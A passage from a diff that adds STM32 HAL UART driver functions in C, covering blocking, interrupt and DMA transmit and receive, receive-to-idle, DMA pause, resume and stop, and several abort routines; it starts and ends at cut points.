*pdata16bits = (uint16_t)(huart->Instance->DR & 0x01FF); + pdata16bits++; + } + else + { + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) || ((huart->Init.WordLength == UART_WORDLENGTH_8B) && (huart->Init.Parity == UART_PARITY_NONE))) + { + *pdata8bits = (uint8_t)(huart->Instance->DR & (uint8_t)0x00FF); + } + else + { + *pdata8bits = (uint8_t)(huart->Instance->DR & (uint8_t)0x007F); + } + pdata8bits++; + } + huart->RxXferCount--; + } + + /* At end of Rx process, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sends an amount of data in non blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must indicate the number + * of u16 provided through pData. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Transmit_IT(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + /* Check that a Tx process is not already ongoing */ + if (huart->gState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->pTxBuffPtr = pData; + huart->TxXferSize = Size; + huart->TxXferCount = Size; + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_BUSY_TX; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + /* Enable the UART Transmit data register empty Interrupt */ + __HAL_UART_ENABLE_IT(huart, UART_IT_TXE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives an amount of data in non blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must indicate the number + * of u16 available through pData. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Receive_IT(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + /* Check that a Rx process is not already ongoing */ + if (huart->RxState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(huart); + + /* Set Reception type to Standard reception */ + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + return (UART_Start_Receive_IT(huart, pData, Size)); + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Sends an amount of data in DMA mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must indicate the number + * of u16 provided through pData. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Transmit_DMA(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + uint32_t *tmp; + + /* Check that a Tx process is not already ongoing */ + if (huart->gState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->pTxBuffPtr = pData; + huart->TxXferSize = Size; + huart->TxXferCount = Size; + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_BUSY_TX; + + /* Set the UART DMA transfer complete callback */ + huart->hdmatx->XferCpltCallback = UART_DMATransmitCplt; + + /* Set the UART DMA Half transfer complete callback */ + huart->hdmatx->XferHalfCpltCallback = UART_DMATxHalfCplt; + + /* Set the DMA error callback */ + huart->hdmatx->XferErrorCallback = UART_DMAError; + + /* Set the DMA abort callback */ + huart->hdmatx->XferAbortCallback = NULL; + + /* Enable the UART transmit DMA stream */ + tmp = (uint32_t *)&pData; + HAL_DMA_Start_IT(huart->hdmatx, *(uint32_t *)tmp, (uint32_t)&huart->Instance->DR, Size); + + /* Clear the TC flag in the SR register by writing 0 to it */ + __HAL_UART_CLEAR_FLAG(huart, UART_FLAG_TC); + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + /* Enable the DMA transfer for transmit request by setting the DMAT bit + in the UART CR3 register */ + ATOMIC_SET_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives an amount of data in DMA mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must indicate the number + * of u16 available through pData. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @note When the UART parity is enabled (PCE = 1) the received data contains the parity bit. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Receive_DMA(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + /* Check that a Rx process is not already ongoing */ + if (huart->RxState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(huart); + + /* Set Reception type to Standard reception */ + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + return (UART_Start_Receive_DMA(huart, pData, Size)); + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Pauses the DMA Transfer. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_DMAPause(UART_HandleTypeDef *huart) +{ + uint32_t dmarequest = 0x00U; + + /* Process Locked */ + __HAL_LOCK(huart); + + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT); + if ((huart->gState == HAL_UART_STATE_BUSY_TX) && dmarequest) + { + /* Disable the UART DMA Tx request */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + } + + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR); + if ((huart->RxState == HAL_UART_STATE_BUSY_RX) && dmarequest) + { + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_PEIE); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* Disable the UART DMA Rx request */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief Resumes the DMA Transfer. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_DMAResume(UART_HandleTypeDef *huart) +{ + /* Process Locked */ + __HAL_LOCK(huart); + + if (huart->gState == HAL_UART_STATE_BUSY_TX) + { + /* Enable the UART DMA Tx request */ + ATOMIC_SET_BIT(huart->Instance->CR3, USART_CR3_DMAT); + } + + if (huart->RxState == HAL_UART_STATE_BUSY_RX) + { + /* Clear the Overrun flag before resuming the Rx transfer*/ + __HAL_UART_CLEAR_OREFLAG(huart); + + /* Re-enable PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_PEIE); + ATOMIC_SET_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* Enable the UART DMA Rx request */ + ATOMIC_SET_BIT(huart->Instance->CR3, USART_CR3_DMAR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief Stops the DMA Transfer. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_DMAStop(UART_HandleTypeDef *huart) +{ + uint32_t dmarequest = 0x00U; + /* The Lock is not implemented on this API to allow the user application + to call the HAL UART API under callbacks HAL_UART_TxCpltCallback() / HAL_UART_RxCpltCallback(): + when calling HAL_DMA_Abort() API the DMA TX/RX Transfer complete interrupt is generated + and the correspond call back is executed HAL_UART_TxCpltCallback() / HAL_UART_RxCpltCallback() + */ + + /* Stop UART DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT); + if ((huart->gState == HAL_UART_STATE_BUSY_TX) && dmarequest) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the UART DMA Tx stream */ + if (huart->hdmatx != NULL) + { + HAL_DMA_Abort(huart->hdmatx); + } + UART_EndTxTransfer(huart); + } + + /* Stop UART DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR); + if ((huart->RxState == HAL_UART_STATE_BUSY_RX) && dmarequest) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the UART DMA Rx stream */ + if (huart->hdmarx != NULL) + { + HAL_DMA_Abort(huart->hdmarx); + } + UART_EndRxTransfer(huart); + } + + return HAL_OK; +} + +/** + * @brief Receive an amount of data in blocking mode till either the expected number of data is received or an IDLE event occurs. + * @note HAL_OK is returned if reception is completed (expected number of data has been received) + * or if reception is stopped after IDLE event (less than the expected number of data has been received) + * In this case, RxLen output parameter indicates number of data available in reception buffer. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M = 01), + * the received data is handled as a set of uint16_t. In this case, Size must indicate the number + * of uint16_t available through pData. + * @param huart UART handle. + * @param pData Pointer to data buffer (uint8_t or uint16_t data elements). + * @param Size Amount of data elements (uint8_t or uint16_t) to be received. + * @param RxLen Number of data elements finally received (could be lower than Size, in case reception ends on IDLE event) + * @param Timeout Timeout duration expressed in ms (covers the whole reception sequence). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UARTEx_ReceiveToIdle(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size, uint16_t *RxLen, + uint32_t Timeout) +{ + uint8_t *pdata8bits; + uint16_t *pdata16bits; + uint32_t tickstart; + + /* Check that a Rx process is not already ongoing */ + if (huart->RxState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + __HAL_LOCK(huart); + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->RxState = HAL_UART_STATE_BUSY_RX; + huart->ReceptionType = HAL_UART_RECEPTION_TOIDLE; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + huart->RxXferSize = Size; + huart->RxXferCount = Size; + + /* In case of 9bits/No Parity transfer, pRxData needs to be handled as a uint16_t pointer */ + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) && (huart->Init.Parity == UART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) pData; + } + else + { + pdata8bits = pData; + pdata16bits = NULL; + } + + __HAL_UNLOCK(huart); + + /* Initialize output number of received elements */ + *RxLen = 0U; + + /* as long as data have to be received */ + while (huart->RxXferCount > 0U) + { + /* Check if IDLE flag is set */ + if (__HAL_UART_GET_FLAG(huart, UART_FLAG_IDLE)) + { + /* Clear IDLE flag in ISR */ + __HAL_UART_CLEAR_IDLEFLAG(huart); + + /* If Set, but no data ever received, clear flag without exiting loop */ + /* If Set, and data has already been received, this means Idle Event is valid : End reception */ + if (*RxLen > 0U) + { + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; + } + } + + /* Check if RXNE flag is set */ + if (__HAL_UART_GET_FLAG(huart, UART_FLAG_RXNE)) + { + if (pdata8bits == NULL) + { + *pdata16bits = (uint16_t)(huart->Instance->DR & (uint16_t)0x01FF); + pdata16bits++; + } + else + { + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) || ((huart->Init.WordLength == UART_WORDLENGTH_8B) && (huart->Init.Parity == UART_PARITY_NONE))) + { + *pdata8bits = (uint8_t)(huart->Instance->DR & (uint8_t)0x00FF); + } + else + { + *pdata8bits = (uint8_t)(huart->Instance->DR & (uint8_t)0x007F); + } + + pdata8bits++; + } + /* Increment number of received elements */ + *RxLen += 1U; + huart->RxXferCount--; + } + + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + huart->RxState = HAL_UART_STATE_READY; + + return HAL_TIMEOUT; + } + } + } + + /* Set number of received elements in output parameter : RxLen */ + *RxLen = huart->RxXferSize - huart->RxXferCount; + /* At end of Rx process, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in interrupt mode till either the expected number of data is received or an IDLE event occurs. + * @note Reception is initiated by this function call. Further progress of reception is achieved thanks + * to UART interrupts raised by RXNE and IDLE events. Callback is called at end of reception indicating + * number of received data elements. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M = 01), + * the received data is handled as a set of uint16_t. In this case, Size must indicate the number + * of uint16_t available through pData. + * @param huart UART handle. + * @param pData Pointer to data buffer (uint8_t or uint16_t data elements). + * @param Size Amount of data elements (uint8_t or uint16_t) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UARTEx_ReceiveToIdle_IT(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef status; + + /* Check that a Rx process is not already ongoing */ + if (huart->RxState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + __HAL_LOCK(huart); + + /* Set Reception type to reception till IDLE Event*/ + huart->ReceptionType = HAL_UART_RECEPTION_TOIDLE; + + status = UART_Start_Receive_IT(huart, pData, Size); + + /* Check Rx process has been successfully started */ + if (status == HAL_OK) + { + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + __HAL_UART_CLEAR_IDLEFLAG(huart); + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); + } + else + { + /* In case of errors already pending when reception is started, + Interrupts may have already been raised and lead to reception abortion. + (Overrun error for instance). + In such case Reception Type has been reset to HAL_UART_RECEPTION_STANDARD. */ + status = HAL_ERROR; + } + } + + return status; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in DMA mode till either the expected number of data is received or an IDLE event occurs. + * @note Reception is initiated by this function call. Further progress of reception is achieved thanks + * to DMA services, transferring automatically received data elements in user reception buffer and + * calling registered callbacks at half/end of reception. UART IDLE events are also used to consider + * reception phase as ended. In all cases, callback execution will indicate number of received data elements. + * @note When the UART parity is enabled (PCE = 1), the received data contain + * the parity bit (MSB position). + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M = 01), + * the received data is handled as a set of uint16_t. In this case, Size must indicate the number + * of uint16_t available through pData. + * @param huart UART handle. + * @param pData Pointer to data buffer (uint8_t or uint16_t data elements). + * @param Size Amount of data elements (uint8_t or uint16_t) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UARTEx_ReceiveToIdle_DMA(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef status; + + /* Check that a Rx process is not already ongoing */ + if (huart->RxState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + __HAL_LOCK(huart); + + /* Set Reception type to reception till IDLE Event*/ + huart->ReceptionType = HAL_UART_RECEPTION_TOIDLE; + + status = UART_Start_Receive_DMA(huart, pData, Size); + + /* Check Rx process has been successfully started */ + if (status == HAL_OK) + { + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + __HAL_UART_CLEAR_IDLEFLAG(huart); + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); + } + else + { + /* In case of errors already pending when reception is started, + Interrupts may have already been raised and lead to reception abortion. + (Overrun error for instance). + In such case Reception Type has been reset to HAL_UART_RECEPTION_STANDARD. */ + status = HAL_ERROR; + } + } + + return status; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Abort ongoing transfers (blocking mode). + * @param huart UART handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable UART Interrupts (Tx and Rx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Abort(UART_HandleTypeDef *huart) +{ + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* If Reception till IDLE event was ongoing, disable IDLEIE interrupt */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_IDLEIE)); + } + + /* Disable the UART DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the UART DMA Tx stream: use blocking DMA Abort API (no callback) */ + if (huart->hdmatx != NULL) + { + /* Set the UART DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + huart->hdmatx->XferAbortCallback = NULL; + + if (HAL_DMA_Abort(huart->hdmatx) != HAL_OK) + { + if (HAL_DMA_GetError(huart->hdmatx) == HAL_DMA_ERROR_TIMEOUT) + { + /* Set error code to DMA */ + huart->ErrorCode = HAL_UART_ERROR_DMA; + + return HAL_TIMEOUT; + } + } + } + } + + /* Disable the UART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the UART DMA Rx stream: use blocking DMA Abort API (no callback) */ + if (huart->hdmarx != NULL) + { + /* Set the UART DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + huart->hdmarx->XferAbortCallback = NULL; + + if (HAL_DMA_Abort(huart->hdmarx) != HAL_OK) + { + if (HAL_DMA_GetError(huart->hdmarx) == HAL_DMA_ERROR_TIMEOUT) + { + /* Set error code to DMA */ + huart->ErrorCode = HAL_UART_ERROR_DMA; + + return HAL_TIMEOUT; + } + } + } + } + + /* Reset Tx and Rx transfer counters */ + huart->TxXferCount = 0x00U; + huart->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + huart->ErrorCode = HAL_UART_ERROR_NONE; + + /* Restore huart->RxState and huart->gState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->gState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + return HAL_OK; +} + +/** + * @brief Abort ongoing Transmit transfer (blocking mode). + * @param huart UART handle. + * @note This procedure could be used for aborting any ongoing Tx transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable UART Interrupts (Tx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_AbortTransmit(UART_HandleTypeDef *huart) +{ + /* Disable TXEIE and TCIE interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* Disable the UART DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the UART DMA Tx stream : use blocking DMA Abort API (no callback) */ + if (huart->hdmatx != NULL) + { + /* Set the UART DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + huart->hdmatx->XferAbortCallback = NULL; + + if (HAL_DMA_Abort(huart->hdmatx) != HAL_OK) + { + if (HAL_DMA_GetError(huart->hdmatx) == HAL_DMA_ERROR_TIMEOUT) + { + /* Set error code to DMA */ + huart->ErrorCode = HAL_UART_ERROR_DMA; + + return HAL_TIMEOUT; + } + } + } + } + + /* Reset Tx transfer counter */ + huart->TxXferCount = 0x00U; + + /* Restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing Receive transfer (blocking mode). + * @param huart UART handle. + * @note This procedure could be used for aborting any ongoing Rx transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable UART Interrupts (Rx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_AbortReceive(UART_HandleTypeDef *huart) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* If Reception till IDLE event was ongoing, disable IDLEIE interrupt */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_IDLEIE)); + } + + /* Disable the UART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the UART DMA Rx stream : use blocking DMA Abort API (no callback) */ + if (huart->hdmarx != NULL) + { + /* Set the UART DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + huart->hdmarx->XferAbortCallback = NULL; + + if (HAL_DMA_Abort(huart->hdmarx) != HAL_OK) + { + if (HAL_DMA_GetError(huart->hdmarx) == HAL_DMA_ERROR_TIMEOUT) + { + /* Set error code to DMA */ + huart->ErrorCode = HAL_UART_ERROR_DMA; + + return HAL_TIMEOUT; + } + } + } + } + + /* Reset Rx transfer counter */ + huart->RxXferCount = 0x00U; + + /* Restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + return HAL_OK; +} + +/** + * @brief Abort ongoing transfers (Interrupt mode). + * @param huart UART handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable UART Interrupts (Tx and Rx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Abort_IT(UART_HandleTypeDef *huart) +{ + uint32_t AbortCplt = 0x01U; + + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* If Reception till IDLE event was ongoing, disable IDLEIE interrupt */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_IDLEIE)); + } + + /* If DMA Tx and/or DMA Rx Handles are associated to UART Handle, DMA Abort complete callbacks should be initialised + before any call to DMA Abort functions */ + /* DMA Tx Handle is valid */ + if (huart->hdmatx != NULL) + { + /* Set DMA Abort Complete callback if UART DMA Tx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT)) + { + huart->hdmatx->XferAbortCallback = UART_DMATxAbortCallback; + } + else + { + huart->hdmatx->XferAbortCallback = NULL; + } + } + /* DMA Rx Handle is valid */ + if (huart->hdmarx != NULL) + { + /* Set DMA Abort Complete callback if UART DMA Rx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + huart->hdmarx->XferAbortCallback = UART_DMARxAbortCallback; + } + else + { + huart->hdmarx->XferAbortCallback = NULL; + } + } + + /* Disable the UART DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT)) + { + /* Disable DMA Tx at UART level */ + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the UART DMA Tx stream : use non blocking DMA Abort API (callback) */ + if (huart->hdmatx != NULL) + { + /* UART Tx DMA Abort callback has already been initialised : + will lead to call HAL_UART_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(huart->hdmatx) != HAL_OK) + { + huart->hdmatx->XferAbortCallback = NULL; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* Disable the UART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAR)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the UART DMA Rx stream : use non blocking DMA Abort API (callback) */ + if (huart->hdmarx != NULL) + { + /* UART Rx DMA Abort callback has already been initialised : + will lead to call HAL_UART_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(huart->hdmarx) != HAL_OK) + { + huart->hdmarx->XferAbortCallback = NULL; + AbortCplt = 0x01U; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* if no DMA abort complete callback execution is required => call user Abort Complete callback */ + if (AbortCplt == 0x01U) + { + /* Reset Tx and Rx transfer counters */ + huart->TxXferCount = 0x00U; + huart->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + huart->ErrorCode = HAL_UART_ERROR_NONE; + + /* Restore huart->gState and huart->RxState to Ready */ + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + huart->AbortCpltCallback(huart); +#else + /* Call legacy weak Abort complete callback */ + HAL_UART_AbortCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing Transmit transfer (Interrupt mode). + * @param huart UART handle. + * @note This procedure could be used for aborting any ongoing Tx transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable UART Interrupts (Tx) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_AbortTransmit_IT(UART_HandleTypeDef *huart) +{ + /* Disable TXEIE and TCIE interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* Disable the UART DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(huart->Instance->CR3, USART_CR3_DMAT)) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the UART DMA Tx stream : use blocking DMA Abort API (no callback) */ + if (huart->hdmatx != NULL) + { + /* Set the UART DMA Abort callback : + will lead to call HAL_UART_AbortCpltCallback() at end of DMA abort procedure */ + huart->hdmatx->XferAbortCallback = UART_DMATxOnlyAbortCallback; + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(huart->hdmatx) != HAL_OK) + { + /* Call Directly huart->hdmatx->XferAbortCallback function in case of error */ + huart->hdmatx->XferAbortCallback(huart->hdmatx); + } + } + else + { + /* Reset Tx transfer counter */ + huart->TxXferCount = 0x00U; + + /* Restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + huart->AbortTransmitCpltCallback(huart); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_UART_AbortTransmitCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + } + else + { + /* Reset Tx transfer counter */ + huart->TxXferCount = 0x00U; + + /* Restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if 